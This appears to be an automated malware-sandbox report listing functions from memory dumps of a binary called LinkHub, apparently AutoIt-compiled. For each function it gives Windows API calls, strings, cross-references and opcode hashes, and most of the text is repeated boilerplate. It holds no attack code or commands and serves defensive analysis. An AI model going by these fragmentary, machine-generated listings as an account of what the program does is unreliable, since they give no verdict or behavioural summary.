Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: b64a2588a9ad4cc15343cb1aaaeda37dac3ac70fac06a384659dd96e52b15f92
Instruction ID: 8e3cc78a112297a1d54ea03928032ea2359e7f50134cc09516254a0659996b1f
Opcode Fuzzy Hash: b64a2588a9ad4cc15343cb1aaaeda37dac3ac70fac06a384659dd96e52b15f92
Instruction Fuzzy Hash: 3C51BB60E08A4286C7127714CD4136EABE0EB14B40F304DDAF0A96A3E9FF35CDC69A47

Function 00BCA8EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 00BCA916

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: a6593a8187d2952506688ec8053ebcb1e516c590b51801a262fcc289051a062b
Instruction ID: ca75020c0d25868cd788328c9653c0739ab64dde9e08e8d68507a233537a883e
Opcode Fuzzy Hash: a6593a8187d2952506688ec8053ebcb1e516c590b51801a262fcc289051a062b
Instruction Fuzzy Hash: 3F51443150424A9FCF25DF68C491BFA7BA0EF15314F248099F8E29B2D0DB749E86CB61

Function 00BCF6CA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00BCF6DB
GlobalMemoryStatusEx.KERNEL32(?), ref: 00BCF6F4

Strings

@, xrefs: 00BCF6E8

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: bab247650a8788a3fcf69875f7beb2af8bc3b3fd38fcf0a9a683ccc0279b4913
Instruction ID: b510100283562fcfbec5c79ac6ce2d7d0bae992ad96d5af61f9a02d2920c2d6f
Opcode Fuzzy Hash: bab247650a8788a3fcf69875f7beb2af8bc3b3fd38fcf0a9a683ccc0279b4913
Instruction Fuzzy Hash: FB5129719087489BD320AF11DC86BBFB7ECFB94304F81489DF1DA511A1DBB08529CB66

Function 00C361A2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?), ref: 00C3623D
_wcslen.LIBCMT ref: 00C36249

Strings

CALLARGARRAY, xrefs: 00C36243, 00C36248

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 8360b77cd4ff70ee1eab8a9b3a2c4ba4d5b3e554cc4e196d1f1bc46f9496a75a
Instruction ID: 55b77391c5a9e5d19f183e020f0444af12cb652dd3815d34f3ef22f23bb09dba
Opcode Fuzzy Hash: 8360b77cd4ff70ee1eab8a9b3a2c4ba4d5b3e554cc4e196d1f1bc46f9496a75a
Instruction Fuzzy Hash: E841C071A10215AFCB04EFA9C8859FEBBF5FF59320F118069F416A7252E7719E81CB90

Function 00C2DB39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00C2DB75
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00C2DB7F

Strings

|, xrefs: 00C2DB50

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: faaeaa0db618706cbdf4d6b45c32c6a172353fc5085cd21f6789c5050c274573
Instruction ID: 26863ba3dc3cd476dc024f3b99abb96226770fec236abadc8692b25db7cc6d9c
Opcode Fuzzy Hash: faaeaa0db618706cbdf4d6b45c32c6a172353fc5085cd21f6789c5050c274573
Instruction Fuzzy Hash: 99317E71C01119ABCF05EFA0DC95EEEBFB9FF14304F140069F819A6266EBB19A06DB50

Function 00C44008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00C440BD
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00C440F8

Strings

static, xrefs: 00C44058

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: bce9cd1047d8e99adfdcc43552380a0f2aab56570c1aecdb963d5bc0d2482326
Instruction ID: 6fb23e5f3425e88f731fd3d7202d548de368e69e78fe0d72490e3e49fcc340ac
Opcode Fuzzy Hash: bce9cd1047d8e99adfdcc43552380a0f2aab56570c1aecdb963d5bc0d2482326
Instruction Fuzzy Hash: D6319C71500604AADB28DF68CC80FFB73A9FF48720F108619FAA687190DA71EC91DB60

Function 00C44FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00C450BD
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C450D2

Strings

', xrefs: 00C4502C

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 67d853db704cb03573ccaff15ed515877b8c74bc9362545dc98be9f5449e1ca6
Instruction ID: 2331c54c8232e82bb07f6e218f2a4d545ac77d526f8c6b2ec6d2e74851f521b3
Opcode Fuzzy Hash: 67d853db704cb03573ccaff15ed515877b8c74bc9362545dc98be9f5449e1ca6
Instruction Fuzzy Hash: 4C310978A0170A9FDB14CF69C984BDE7BB5FF49300F10406AE915AB352D771AA45CF90

Function 00C43C8B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00C43D18
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C43D23

Strings

Combobox, xrefs: 00C43CE5

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 403687ba0490b9ead3c909c6b88dd93624cb73a71430c611a74e3dc9bbf635de
Instruction ID: 62aee9aafdf085c015a571d0d207b2f4847a234d0c5fe62ec041f4f4c7d04efe
Opcode Fuzzy Hash: 403687ba0490b9ead3c909c6b88dd93624cb73a71430c611a74e3dc9bbf635de
Instruction Fuzzy Hash: 3F11B2717102486FEF119F54DC80FBB3BAAFBC43A4F104224F9299B290D6759E5187A0

Function 00C441AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00BB7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00BB78B1
Part of subcall function 00BB7873: GetStockObject.GDI32(00000011), ref: 00BB78C5
Part of subcall function 00BB7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BB78CF

GetWindowRect.USER32(00000000,?), ref: 00C44216
GetSysColor.USER32(00000012), ref: 00C44230

Strings

static, xrefs: 00C441F3

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 2e7819154689d6a1d2558851a63b8b7b28eb7820deea9f913c1f0c20faa1f8a1
Instruction ID: 07bf4e4acaea0399a3301f487ff3b4e711371739043bd374ac593f81eb6c4ad7
Opcode Fuzzy Hash: 2e7819154689d6a1d2558851a63b8b7b28eb7820deea9f913c1f0c20faa1f8a1
Instruction Fuzzy Hash: 9B1126B2610209AFDB10DFA8CC45BFE7BF8FB08314F114924F966E3250D674E8509B60

Function 00C2D763 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C2D7C2
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C2D7EB

Strings

<local>, xrefs: 00C2D7AB

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 2c8251adbad143e8a34ed7f72379023e0975e67cc475040eae8e450469fb4485
Instruction ID: 8eb98a021c69902006cb006ad06e0e01e43124e9d58f21835f9d13987cabbf8f
Opcode Fuzzy Hash: 2c8251adbad143e8a34ed7f72379023e0975e67cc475040eae8e450469fb4485
Instruction Fuzzy Hash: EA112571205232BED7344B62AC49FF7BE9CEB32BA4F10422AF51AC3484D2688940D6F0

Function 00C175ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00BBB329: _wcslen.LIBCMT ref: 00BBB333

CharUpperBuffW.USER32(?,?,?), ref: 00C1761D
_wcslen.LIBCMT ref: 00C17629

Strings

STOP, xrefs: 00C17623, 00C17628

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 336678393d13793d04d64d69f02a8b951dcd85c1b6fec7ee8e8fc926c92fe80e
Instruction ID: 3a18e42ec22b0f2fd9e3a54c8ef610f361e0337b1e1f814652a444185b8d5b6b
Opcode Fuzzy Hash: 336678393d13793d04d64d69f02a8b951dcd85c1b6fec7ee8e8fc926c92fe80e
Instruction Fuzzy Hash: 5F01C4326189268BCB10AEBDCC509FF77B5BB627507400624F43592295EB75DA80A650

Function 00C1262B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BBB329: _wcslen.LIBCMT ref: 00BBB333

Part of subcall function 00C145FD: GetClassNameW.USER32(?,?,000000FF), ref: 00C14620

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C12699

Strings

ListBox, xrefs: 00C12663
ComboBox, xrefs: 00C12638

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 6b967caacc12aa7d6e6ec6d8f081d096416a2059154e7b963e9419e68b4044b5
Instruction ID: 5c3ce9ec8694a6877f1f8cbf25b1e1d498c307d4870444ab194b1bf7dd9d7880
Opcode Fuzzy Hash: 6b967caacc12aa7d6e6ec6d8f081d096416a2059154e7b963e9419e68b4044b5
Instruction Fuzzy Hash: 6901D479640218ABCB08EBA4CC51DFE77A8EF57350B000669B872973C1DAB1595DE650

Function 00C12525 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BBB329: _wcslen.LIBCMT ref: 00BBB333

Part of subcall function 00C145FD: GetClassNameW.USER32(?,?,000000FF), ref: 00C14620

SendMessageW.USER32(?,00000180,00000000,?), ref: 00C12593

Strings

ListBox, xrefs: 00C1255D
ComboBox, xrefs: 00C12532

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: c4396016b11381130d71b10bf41b90b7521af19a8ae1ad320c7f2f29558f8090
Instruction ID: c23d5e0d95927476c8ae9dd61275f2cb2ec0e405bdfc6113c6c80919e21fa954
Opcode Fuzzy Hash: c4396016b11381130d71b10bf41b90b7521af19a8ae1ad320c7f2f29558f8090
Instruction Fuzzy Hash: 0701A779640108ABCB04EB90C962EFE77E9DF47380F5000697852A3281DA949E59A7B1

Function 00C125A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BBB329: _wcslen.LIBCMT ref: 00BBB333

Part of subcall function 00C145FD: GetClassNameW.USER32(?,?,000000FF), ref: 00C14620

SendMessageW.USER32(?,00000182,?,00000000), ref: 00C12615

Strings

ListBox, xrefs: 00C125E1
ComboBox, xrefs: 00C125B6

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 023639ffddfcb07db10ed3d217d4e68e15c804559630e30539b3a6104ef0c255
Instruction ID: 9b26d8f7fead3f48dc4d0144aed30f646378d6e03645c5f667bbb0530e42b4fc
Opcode Fuzzy Hash: 023639ffddfcb07db10ed3d217d4e68e15c804559630e30539b3a6104ef0c255
Instruction Fuzzy Hash: 5201D179A401086BCB05EBA0D952EFF77E89F17340F500066B852A32C1DBA58E59F6B6

Function 00C126B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BBB329: _wcslen.LIBCMT ref: 00BBB333

Part of subcall function 00C145FD: GetClassNameW.USER32(?,?,000000FF), ref: 00C14620

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00C12720

Strings

ListBox, xrefs: 00C126ED
ComboBox, xrefs: 00C126C2

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: baf97a2256631b5827cefcda17d3aa52d3720f05015add0f787a39aebefca39d
Instruction ID: 5b8d865573a9aa5839fe70a2913aa24130472a9cbe9243b3b3b6d4b5722d6397
Opcode Fuzzy Hash: baf97a2256631b5827cefcda17d3aa52d3720f05015add0f787a39aebefca39d
Instruction Fuzzy Hash: 8EF0A479A4021867CB08F7A4CC51FFF77A8AF07750F400965B472A32C1DBA5590CA2A4

Function 00C11461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C1146F

Strings

AutoIt, xrefs: 00C11463
Error allocating memory., xrefs: 00C11468

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 17b6389e8ea0c76bd9f53259d58db6ec7d485def58e41b5c81b4a93d3ddef60b
Instruction ID: a6a506e4650c48ba8e45ae6f918431375ef762b736f3c5d9ec5c894d6b43f038
Opcode Fuzzy Hash: 17b6389e8ea0c76bd9f53259d58db6ec7d485def58e41b5c81b4a93d3ddef60b
Instruction Fuzzy Hash: 43E0D83134872437D2243794BC03FD8B6C49F05B61F15486BF749745C25EE324904299

Function 00BD10B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00BCFAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00BD10E2,?,?,?,00BB100A), ref: 00BCFAD9

IsDebuggerPresent.KERNEL32(?,?,?,00BB100A), ref: 00BD10E6
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00BB100A), ref: 00BD10F5

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00BD10F0

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: c5e19b2610603d2ec76bd57233d7532a49084695143358670143400aac571bfd
Instruction ID: 8b3a97784ef9dee05f0af1952bf6acbd65ecebdcd620c2dcaa89c068c83cd073
Opcode Fuzzy Hash: c5e19b2610603d2ec76bd57233d7532a49084695143358670143400aac571bfd
Instruction Fuzzy Hash: B6E06D746003118FD330AF28E816756BBE8EB00302F108DADE886D2351EBF4D488CB91

Function 00C239D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00C239F0
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00C23A05

Strings

aut, xrefs: 00C239F9

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 3a25c259a3713402379e8f16355d5c606af9f21e60c3c79e59a9637af4fffaac
Instruction ID: 910904576179ac428440bb2bc3e12a213379bee136e5dd750eec92aab02fc594
Opcode Fuzzy Hash: 3a25c259a3713402379e8f16355d5c606af9f21e60c3c79e59a9637af4fffaac
Instruction Fuzzy Hash: 6CD05EB650032867DA30A7649C0EFCF7B6CEB45721F0002A1BA5692091DAF0DA85CB90

Function 00C42DF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C42E08
PostMessageW.USER32(00000000), ref: 00C42E0F

Part of subcall function 00C1F292: Sleep.KERNEL32 ref: 00C1F30A

Strings

Shell_TrayWnd, xrefs: 00C42E01

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

